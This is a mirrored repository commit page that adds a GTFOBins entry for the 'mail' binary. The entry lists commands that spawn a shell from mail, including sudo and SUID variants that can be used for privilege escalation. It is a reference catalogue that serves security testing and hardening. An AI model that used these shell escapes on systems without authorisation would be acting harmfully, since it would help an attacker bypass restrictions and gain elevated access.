mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-08-23 17:44:49 +02:00
Add mail
This commit is contained in:
15
_gtfobins/mail.md
Normal file
15
_gtfobins/mail.md
Normal file
@@ -0,0 +1,15 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
execute-interactive:
|
||||||
|
- code: |
|
||||||
|
mail -f /etc/hosts
|
||||||
|
!/bin/sh
|
||||||
|
sudo-enabled:
|
||||||
|
- code: |
|
||||||
|
sudo mail -f /etc/hosts
|
||||||
|
!/bin/sh
|
||||||
|
suid-limited:
|
||||||
|
- code: |-
|
||||||
|
./mail -f /etc/hosts
|
||||||
|
!/bin/sh
|
||||||
|
---
|
Reference in New Issue
Block a user